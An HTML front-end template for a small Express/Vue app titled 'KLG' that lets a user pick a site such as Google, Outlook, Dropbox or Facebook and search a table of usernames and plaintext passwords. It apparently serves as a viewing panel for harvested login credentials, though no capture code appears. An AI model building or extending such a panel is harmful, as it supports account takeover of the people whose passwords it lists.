<html>

<head>
  <title>Express</title>
  <link rel="stylesheet" href="/stylesheets/style.css">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
  <script src="https://cdn.jsdelivr.net/npm/vue"></script>
</head>

<body>
  <div id="app" class="container">
    <h1>KLG</h1>
    <div>
      <div class="form-group">
        <label for="site" class="bmd-label-floating">Site</label>
        <select name="site" id="site" v-model="site" class="form-control" aria-placeholder="Select site" v-on:change="search">
          <option value="">Select site</option>
          <option value="google">Google</option>
          <option value="outlook">Outlook</option>
          <option value="live">Live</option>
          <option value="dropbox">Dropbox</option>
          <option value="yahoo">Yahoo</option>
	  <option value="facebook">Facebook</option>
        </select>

        <label for="username" class="bmd-label-placeholder">Search</label>
        <input type="text" id="username" class="form-control" v-model="username" v-on:keyup="search">
      </div>
      <div>
          <table class="table table-striped">
              <thead class="thead-light">
                <tr>
                  <th scope="col">Site</th>
                  <th scope="col">Username</th>
                  <th scope="col">Password</th>
                </tr>
              </thead>
              <tbody>
                <tr v-for="r in result">
                  <th scope="row">{{site}}</th>
                  <td>{{r.username}}</td>
                  <td>{{r.password}}</td>
                </tr>
              </tbody>
            </table>
      </div>


    </div>
  </div>
  	<script src="javascripts/app.js"></script>
	<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
	<script src="https://unpkg.com/axios/dist/axios.min.js"></script>
</body>

</html>
